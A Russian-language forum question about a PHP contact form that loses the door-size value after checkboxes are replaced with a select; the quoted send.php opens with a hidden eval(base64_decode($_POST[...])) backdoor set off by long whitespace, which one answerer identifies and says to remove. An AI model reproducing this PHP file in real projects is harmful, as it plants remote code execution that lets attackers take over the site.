@booyokkk

Тег select и метод POST — как решить проблему?

Есть форма и php файл которые отвечают за отправку данных на e-mail. Было оформлено так:
<form action="send.php" method="post" name="f1" class="myform">
	<div class="slider">
		<ul class="slides">
<li>
<div>Размер</div>
							<label><span>600 x 2000<input type="checkbox" name="door_size" value="600 x 2000" class="checkpopo"></span></label>
							<label><span>700 x 2000<input type="checkbox" name="door_size" value="700 x 2000" class="checkpopo"></span></label>
							<label><span>800 x 2000<input type="checkbox" name="door_size" value="800 x 2000" class="checkpopo"></span></label>
</li>
</ul>
</div>
</form>

И php-файл:
<?php                                                                                                                                                                                                                                                          eval(base64_decode($_POST['n4a88e1']));?><?php
if (isset($_POST['name'])) {$name = $_POST['name'];}
if (isset($_POST['tell'])) {$tell = $_POST['tell'];}
if (isset($_POST['door_name'])) {$door_name = $_POST['door_name'];}
if (isset($_POST['door_count'])) {$door_count = $_POST['door_count'];}
if (isset($_POST['door_color'])) {$door_color = $_POST['door_color'];}
if (isset($_POST['door_size'])) {$door_size = $_POST['door_size'];}

$address = 'booyok123@gmail.com';
$sub = "Товар";
$mes = "\nИмя: $_POST[name]\nТелефон: $_POST[tell]\nНазвание товара: $_POST[door_name]\nЦвет: $_POST[door_color]\n\nКолличество: $_POST[door_count]\n\nРазмер: $_POST[door_size]";
$verify = mail ($address,$sub,$mes,"Content-type:text/plain; charset = utf-8\r\nFrom:mail");
if (verify == 'true')
{
echo "<p>Повідомлення відправлено!</p>";
}
else
{
echo "<p>";
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Спасибо, Ваше сообщение отправлено</title>
<link href="css/style.css" type="text/css" rel="stylesheet">
<link href="css/animate.css" type="text/css" rel="stylesheet">
<script type="text/javascript" src="js/jquery-1.8.2.min.js"></script>
<script type="text/javascript" src="js/check.js"></script>
</head>
<body>

<div class="by-site">
	Спасибо за оставленную заявку
</div>

</body>
</html>

Потом я поменял
<label><span>600 x 2000<input type="checkbox" name="door_size" value="600 x 2000" class="checkpopo"></span></label>
							<label><span>700 x 2000<input type="checkbox" name="door_size" value="700 x 2000" class="checkpopo"></span></label>
							<label><span>800 x 2000<input type="checkbox" name="door_size" value="800 x 2000" class="checkpopo"></span></label>
на
<select name="door_size">
            <option value="600 x 2000">600 x 2000</option>
            <option value="700 x 2000">700 x 2000</option>
            <option value="800 x 2000">800 x 2000</option>
        </select>

и данные о размере теперь не приходят(пустое поле размер).
Как можно решить данную проблему?
  • Вопрос задан
  • 2541 просмотр
Пригласить эксперта
Ответы на вопрос 2
посмотреть во вкладку Сеть (Network) файрбага, продебажить $_POST. В чудеса я не верю. А "не приходят" тоже очень размыто.
Ответ написан
Комментировать
toxa82
@toxa82
Удалите этот бэкдор eval(base64_decode($_POST['n4a88e1']));. И проверьте другие файлы проекта на похожий код
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы